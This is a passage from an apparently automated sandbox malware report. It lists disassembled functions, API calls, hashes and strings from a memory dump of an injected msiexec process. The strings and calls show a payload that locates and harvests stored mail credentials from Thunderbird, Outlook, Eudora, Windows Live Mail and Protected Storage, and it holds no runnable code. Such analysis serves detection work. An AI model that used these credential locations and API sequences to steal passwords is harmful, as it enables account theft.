                                                              • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                              • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                              • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                              • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                              Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$memset
                                                              • String ID:
                                                              • API String ID: 1860491036-0
                                                              • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                              • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                              • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                              • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                              Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                              • free.MSVCRT ref: 0040A908
                                                              • free.MSVCRT ref: 0040A92B
                                                              • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free$memcpy$mallocwcslen
                                                              • String ID:
                                                              • API String ID: 726966127-0
                                                              • Opcode ID: 9ee2b47597eab8627c31dfd54b85c52fe58fd1a50257b2b4a42ebb2a05ccea6e
                                                              • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                              • Opcode Fuzzy Hash: 9ee2b47597eab8627c31dfd54b85c52fe58fd1a50257b2b4a42ebb2a05ccea6e
                                                              • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                              Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • wcslen.MSVCRT ref: 0040B1DE
                                                              • free.MSVCRT ref: 0040B201
                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                              • free.MSVCRT ref: 0040B224
                                                              • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free$memcpy$mallocwcslen
                                                              • String ID:
                                                              • API String ID: 726966127-0
                                                              • Opcode ID: a2b8a7b7bc016de371920ce84c4526f0173927f4c1a81b7840355c423501a2a0
                                                              • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                              • Opcode Fuzzy Hash: a2b8a7b7bc016de371920ce84c4526f0173927f4c1a81b7840355c423501a2a0
                                                              • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                              Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                              • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                              • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                              • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcmp$memcpy
                                                              • String ID:
                                                              • API String ID: 231171946-0
                                                              • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                              • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                              • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                              • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                              Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • strlen.MSVCRT ref: 0040B0D8
                                                              • free.MSVCRT ref: 0040B0FB
                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                              • free.MSVCRT ref: 0040B12C
                                                              • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free$memcpy$mallocstrlen
                                                              • String ID:
                                                              • API String ID: 3669619086-0
                                                              • Opcode ID: eb405aabfd6e747a13101961e672a7388de2744f2c51c56a8eb0d610ae61b36d
                                                              • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                              • Opcode Fuzzy Hash: eb405aabfd6e747a13101961e672a7388de2744f2c51c56a8eb0d610ae61b36d
                                                              • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                              Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@
                                                              • String ID:
                                                              • API String ID: 1033339047-0
                                                              • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                              • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                              • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                              • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                              Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                              • malloc.MSVCRT ref: 00417407
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                              • free.MSVCRT ref: 00417425
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$freemalloc
                                                              • String ID:
                                                              • API String ID: 2605342592-0
                                                              • Opcode ID: 83a2f8aa6e63983656d4fab6a303ce5997479b3bf05a742e9efdfe729434c34a
                                                              • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                              • Opcode Fuzzy Hash: 83a2f8aa6e63983656d4fab6a303ce5997479b3bf05a742e9efdfe729434c34a
                                                              • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                              Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcslen$wcscat$wcscpy
                                                              • String ID:
                                                              • API String ID: 1961120804-0
                                                              • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                              • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                              • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                              • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                              Executed Functions

                                                              Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 132 408484-408488 130->132 133 408455-40845e 130->133 134 408422-40842b 131->134 135 408460-408464 133->135 136 408465-408482 133->136 137 408432-40844e 134->137 138 40842d-408431 134->138 135->136 136->132 136->133 137->130 137->134 138->137
                                                              APIs
                                                              • memset.MSVCRT ref: 0040832F
                                                              • memset.MSVCRT ref: 00408343
                                                              • memset.MSVCRT ref: 0040835F
                                                              • memset.MSVCRT ref: 00408376
                                                              • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                              • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                              • strlen.MSVCRT ref: 004083E9
                                                              • strlen.MSVCRT ref: 004083F8
                                                              • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                              • String ID: 5$H$O$b$i$}$}
                                                              • API String ID: 1832431107-3760989150
                                                              • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                              • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                              • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                              • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                              Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 335 407ef8-407f01 336 407f03-407f22 FindFirstFileA 335->336 337 407f24-407f38 FindNextFileA 335->337 338 407f3f-407f44 336->338 339 407f46-407f74 strlen * 2 337->339 340 407f3a call 407f90 337->340 338->339 342 407f89-407f8f 338->342 343 407f83 339->343 344 407f76-407f81 call 4070e3 339->344 340->338 346 407f86-407f88 343->346 344->346 346->342
                                                              APIs
                                                              • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                              • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                              • strlen.MSVCRT ref: 00407F5C
                                                              • strlen.MSVCRT ref: 00407F64
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileFindstrlen$FirstNext
                                                              • String ID: ACD
                                                              • API String ID: 379999529-620537770
                                                              • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                              • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                              • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                              • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                              Function 00401E69 Relevance: 52.8, APIs: 18, Strings: 12, Instructions: 261stringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 00401E8B
                                                              • strlen.MSVCRT ref: 00401EA4
                                                              • strlen.MSVCRT ref: 00401EB2
                                                              • strlen.MSVCRT ref: 00401EF8
                                                              • strlen.MSVCRT ref: 00401F06
                                                              • memset.MSVCRT ref: 00401FB1
                                                              • atoi.MSVCRT(?), ref: 00401FE0
                                                              • memset.MSVCRT ref: 00402003
                                                              • sprintf.MSVCRT ref: 00402030
                                                              • memset.MSVCRT ref: 00402086
                                                              • memset.MSVCRT ref: 0040209B
                                                              • strlen.MSVCRT ref: 004020A1
                                                              • strlen.MSVCRT ref: 004020AF
                                                              • strlen.MSVCRT ref: 004020E2
                                                              • strlen.MSVCRT ref: 004020F0
                                                              • memset.MSVCRT ref: 00402018
                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                              • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                              • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                              • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$`{g$current$nss3.dll$sqlite3.dll
                                                              • API String ID: 3833278029-1827388529
                                                              • Opcode ID: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                              • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                              • Opcode Fuzzy Hash: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                              • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                              Function 0040CF44 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                              • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                              • DeleteObject.GDI32(?), ref: 0040D1A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                              • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                              • API String ID: 745651260-375988210
                                                              • Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                              • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                              • Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                              • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                              Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                              • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                              • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                              • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                              Strings
                                                              • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                              • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                              • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                              • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                              • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                              • PStoreCreateInstance, xrefs: 00403C44
                                                              • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                              • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                              • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                              • pstorec.dll, xrefs: 00403C30
                                                              • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                              • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProc_mbscpy
                                                              • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                              • API String ID: 1197458902-317895162
                                                              • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                              • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                              • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                              • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                              Function 00444C4A Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 238 444c80-444c85 236->238 239 444c9f-444ca3 236->239 244 444d02-444d0d __setusermatherr 237->244 245 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->245 238->234 241 444c8c-444c93 238->241 239->234 242 444ca5-444ca7 239->242 241->234 246 444c95-444c9d 241->246 247 444cad-444cb0 242->247 244->245 250 444da4-444da7 245->250 251 444d6a-444d72 245->251 246->247 247->237 254 444d81-444d85 250->254 255 444da9-444dad 250->255 252 444d74-444d76 251->252 253 444d78-444d7b 251->253 252->251 252->253 253->254 256 444d7d-444d7e 253->256 257 444d87-444d89 254->257 258 444d8b-444d9c GetStartupInfoA 254->258 255->250 256->254 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                              • String ID:
                                                              • API String ID: 3662548030-0
                                                              • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                              • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                              • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                              • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                                                              Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 0044430B
                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                              • memset.MSVCRT ref: 00444379
                                                              • memset.MSVCRT ref: 00444394
                                                              • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                              • strlen.MSVCRT ref: 004443DB
                                                              • _strcmpi.MSVCRT ref: 00444401
                                                              Strings
                                                              • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                              • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                              • Store Root, xrefs: 004443A5
                                                              • \Microsoft\Windows Mail, xrefs: 00444329
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                              • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                              • API String ID: 3203569119-2578778931
                                                              • Opcode ID: a5a3b5de69c01cde89edf01c6ca21efea8d82838e5b9820ad63090ec74a4c9c8
                                                              • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                              • Opcode Fuzzy Hash: a5a3b5de69c01cde89edf01c6ca21efea8d82838e5b9820ad63090ec74a4c9c8
                                                              • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                              Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 290 40ccd7-40cd06 ??2@YAPAXI@Z 291 40cd08-40cd0d 290->291 292 40cd0f 290->292 293 40cd11-40cd24 ??2@YAPAXI@Z 291->293 292->293 294 40cd26-40cd2d call 404025 293->294 295 40cd2f 293->295 297 40cd31-40cd57 294->297 295->297 299 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 297->299 300 40cd59-40cd60 DeleteObject 297->300 300->299
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                              • String ID:
                                                              • API String ID: 2054149589-0
                                                              • Opcode ID: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                              • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                              • Opcode Fuzzy Hash: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                              • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
